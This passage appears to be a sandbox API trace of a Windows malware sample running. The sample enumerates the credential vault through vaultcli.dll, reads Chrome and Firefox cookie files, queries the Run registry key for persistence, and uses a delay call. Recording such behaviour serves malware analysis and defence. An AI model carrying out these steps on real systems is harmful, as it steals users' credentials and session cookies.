[0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b3095dc, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde5c2433, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde5c2433, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xde5c2433, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xde5c2433, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf22b9950, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5848b263, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848b263, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ebef3a1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WIA843~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5850db2d, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5850db2d, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~2")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WINDOW~3")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57763485, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57763485, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Multimedia Platform", cAlternateFileName="WINDOW~4")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WI67CB~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57ad0728, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57ad0728, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WI8A19~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2224dfa5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2224dfa5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsApps", cAlternateFileName="WI7DB9~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc47584, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc47584, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0302.319] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc47584, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc47584, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0302.319] FindClose (in: hFindFile=0x526d60 | out: hFindFile=0x526d60) returned 1 [0302.333] FindFirstFileW (in: lpFileName="D:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.346] FindFirstFileW (in: lpFileName="E:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.370] FindFirstFileW (in: lpFileName="F:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.387] FindFirstFileW (in: lpFileName="G:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.387] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0xde784 | out: BaseAddress=0xde784*=0x70050000) returned 0x0 [0302.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrv.ini", NtPathName=0xde654, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.800] NtCreateFile (in: FileHandle=0xde674, DesiredAccess=0x120089, ObjectAttributes=0xde63c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\J9M369S2\\J9Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde65c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde674*=0x0, IoStatusBlock=0xde65c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.800] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x555180) returned 1 [0302.800] VaultEnumerateVaults () returned 0x0 [0302.807] VaultOpenVault () returned 0x0 [0302.808] VaultEnumerateItems () returned 0x0 [0302.809] VaultFree () returned 0x0 [0302.809] VaultCloseVault () returned 0x0 [0302.809] VaultOpenVault () returned 0x0 [0302.810] VaultEnumerateItems () returned 0x0 [0302.862] VaultFree () returned 0x0 [0302.862] VaultCloseVault () returned 0x0 [0302.862] VaultFree () returned 0x1 [0302.862] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde5a8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0302.862] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtPathName=0xde578, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.863] NtCreateFile (in: FileHandle=0xde598, DesiredAccess=0x120089, ObjectAttributes=0xde560*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde580, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde598*=0x374, IoStatusBlock=0xde580*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.863] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x526068) returned 1 [0302.863] NtQueryInformationFile (in: FileHandle=0x374, IoStatusBlock=0xde580, FileInformation=0xde4d8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde580, FileInformation=0xde4d8) returned 0x0 [0302.863] NtClose (Handle=0x374) returned 0x0 [0302.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtPathName=0xde578, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.864] NtCreateFile (in: FileHandle=0xde598, DesiredAccess=0x120089, ObjectAttributes=0xde560*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde580, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde598*=0x374, IoStatusBlock=0xde580*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.864] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5267a0) returned 1 [0302.864] NtQueryInformationFile (in: FileHandle=0x374, IoStatusBlock=0xde580, FileInformation=0xde4d8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde580, FileInformation=0xde4d8) returned 0x0 [0302.864] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7400) returned 0x570100 [0302.865] NtReadFile (in: FileHandle=0x374, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xde580, Buffer=0x570100, BufferLength=0x7000, ByteOffset=0xde4f0*=0, Key=0x0 | out: IoStatusBlock=0xde580, Buffer=0x570100*) returned 0x0 [0302.868] NtClose (Handle=0x374) returned 0x0 [0302.869] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x570100) returned 1 [0302.921] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde534 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0302.921] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtPathName=0xde578, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.921] NtCreateFile (in: FileHandle=0xde598, DesiredAccess=0x120089, ObjectAttributes=0xde560*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde580, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde598*=0x0, IoStatusBlock=0xde580*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.921] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x526458) returned 1 [0302.921] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", NtPathName=0xde56c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.921] NtCreateFile (in: FileHandle=0xde58c, DesiredAccess=0x120089, ObjectAttributes=0xde554*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde574, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde58c*=0x374, IoStatusBlock=0xde574*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.922] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5499c8) returned 1 [0302.922] NtQueryInformationFile (in: FileHandle=0x374, IoStatusBlock=0xde574, FileInformation=0xde4cc, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde574, FileInformation=0xde4cc) returned 0x0 [0302.922] NtClose (Handle=0x374) returned 0x0 [0302.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", NtPathName=0xde56c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.922] NtCreateFile (in: FileHandle=0xde58c, DesiredAccess=0x120089, ObjectAttributes=0xde554*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\Cookies.sqlite", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde574, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde58c*=0x374, IoStatusBlock=0xde574*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.922] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x549008) returned 1 [0302.922] NtQueryInformationFile (in: FileHandle=0x374, IoStatusBlock=0xde574, FileInformation=0xde4cc, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde574, FileInformation=0xde4cc) returned 0x0 [0302.922] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x80400) returned 0x8510020 [0302.935] NtReadFile (in: FileHandle=0x374, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xde574, Buffer=0x8510020, BufferLength=0x80000, ByteOffset=0xde4e4*=0, Key=0x0 | out: IoStatusBlock=0xde574, Buffer=0x8510020*) returned 0x0 [0303.006] NtClose (Handle=0x374) returned 0x0 [0303.039] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x8510020) returned 1 [0303.043] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.044] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.044] NtClose (Handle=0x374) returned 0x0 [0303.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.044] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.044] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5410d8) returned 1 [0303.044] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.044] NtCreateFile (in: FileHandle=0xdea5c, DesiredAccess=0x120089, ObjectAttributes=0xdea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea5c*=0x0, IoStatusBlock=0xdea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.044] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541008) returned 1 [0303.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0303.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0303.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0303.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0303.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0303.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0303.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0303.072] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x374) returned 0x0 [0303.074] NtEnumerateValueKey (in: KeyHandle=0x374, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0303.074] NtClose (Handle=0x374) returned 0x0 [0303.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0303.075] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde840*=0x0, IoStatusBlock=0xde828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0303.075] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x540a58) returned 1 [0303.075] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtPathName=0xdea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Xmpxd9\\hl-ili.exe", NtFileNamePart=0x0, 